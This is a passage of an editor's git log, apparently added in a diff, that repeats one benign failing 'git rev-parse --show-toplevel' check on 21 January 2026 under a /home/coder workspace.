+2026-01-21 19:20:42.566 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:42.566 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:43.704 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:43.704 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:23:59.328 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:23:59.328 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:26:20.031 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 19:26:20.031 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:26:31.127 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 19:26:31.127 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:51:19.829 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 19:51:19.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:23:01.497 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 20:23:01.497 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:02.165 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:02.165 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:03.391 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:03.391 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:18.787 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:18.787 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:19.845 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:19.845 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:21.289 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:21.289 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:22.822 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:29:22.822 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:26.985 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 20:29:26.985 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:29:33.767 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 20:29:33.767 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:55:59.529 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 20:55:59.529 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:58:32.493 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:58:32.493 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:58:57.223 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:58:57.223 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:59:33.347 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:59:33.347 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:59:43.267 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 20:59:43.267 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 20:59:44.378 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 20:59:44.378 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:05:33.732 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:05:33.732 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:25.773 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 21:08:25.773 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:25.810 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 21:08:25.810 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:26.866 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:08:26.866 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:33.987 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 21:08:33.987 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:34.750 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:08:34.750 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:59.008 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:08:59.008 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:08:59.924 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:08:59.924 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:09:12.605 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:09:12.605 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:09:13.448 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:09:13.448 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:09:36.100 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:09:36.100 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:09:53.347 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 21:09:53.347 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:10:30.793 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:10:30.793 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:10:51.323 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:10:51.323 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:10:51.989 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:10:51.989 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:17:00.517 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:17:00.517 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:21:38.956 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:21:38.956 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:23:51.870 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:23:51.870 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:23:55.965 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 21:23:55.965 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:23:57.444 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:23:57.444 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:24:02.589 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:24:02.589 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:30:15.372 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:30:15.372 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:30:36.491 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:30:36.491 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:30:36.926 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:30:36.926 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:33:27.828 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:33:27.828 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:40:05.723 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 21:40:05.723 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:41:57.223 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:41:57.224 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:45:16.628 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:45:16.628 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:45:40.750 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:45:40.750 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:46:08.021 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:46:08.021 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 21:52:23.750 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 21:52:23.750 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:08:43.529 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:08:43.529 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:08:47.647 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:08:47.647 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:19:30.391 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:19:30.391 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:25:58.911 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:25:58.911 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:26:39.890 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:26:39.890 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:30:39.421 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:30:39.421 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:31:32.612 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:31:32.612 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:31:49.502 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:31:49.502 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:04.870 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:34:04.870 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:11.299 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:11.299 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:25.335 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:34:25.336 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:28.109 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:28.109 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:32.372 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:32.372 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:40.589 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:40.589 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:45.719 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:45.719 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:34:58.260 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:34:58.260 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:05.651 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:05.651 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:13.116 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:35:13.116 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:18.708 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 22:35:18.708 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:24.457 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:24.457 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:29.844 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:35:29.844 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:36.351 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:36.351 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:44.959 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 22:35:44.959 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:48.206 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:48.206 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:51.102 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:51.102 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:35:51.923 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:35:51.923 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:36:02.492 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:36:02.492 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:36:04.914 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:36:04.914 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:40:40.784 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:40:40.784 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:41:04.078 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:41:04.078 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:43:08.694 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:43:08.694 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:43:20.743 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:43:20.743 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:43:21.339 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:43:21.340 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:43:22.592 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:43:22.592 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:43:29.366 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:43:29.366 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:45:15.606 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:45:15.606 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:48:03.357 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 22:48:03.357 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:48:19.049 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:48:19.049 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:54:23.829 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:54:23.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:54:49.449 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 22:54:49.450 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:55:02.994 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:55:02.994 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:56:30.524 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 22:56:30.524 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:56:37.954 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:56:37.954 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:56:38.944 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:56:38.944 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:57:06.745 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:57:06.745 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:57:50.183 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:57:50.183 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 22:59:18.669 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 22:59:18.670 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:00:50.721 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:00:50.721 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:22.686 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:15:22.686 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:53.222 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:15:53.222 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:54.891 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:15:54.891 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:56.675 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:15:56.675 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:57.886 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:15:57.886 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:58.560 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:15:58.560 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:15:59.978 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:15:59.978 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:16:10.144 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:16:10.144 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:16:36.059 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:16:36.059 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:17:38.521 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:17:38.521 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:18:00.435 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:18:00.435 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:18:02.401 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:18:02.401 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:18:02.828 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:18:02.828 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:18:04.515 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:18:04.515 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:20:46.545 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:20:46.545 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:24:52.312 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:24:52.313 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:24:52.887 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:24:52.887 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:25:37.111 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:25:37.111 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:25:37.616 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:25:37.616 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:41:11.314 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:41:11.314 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not 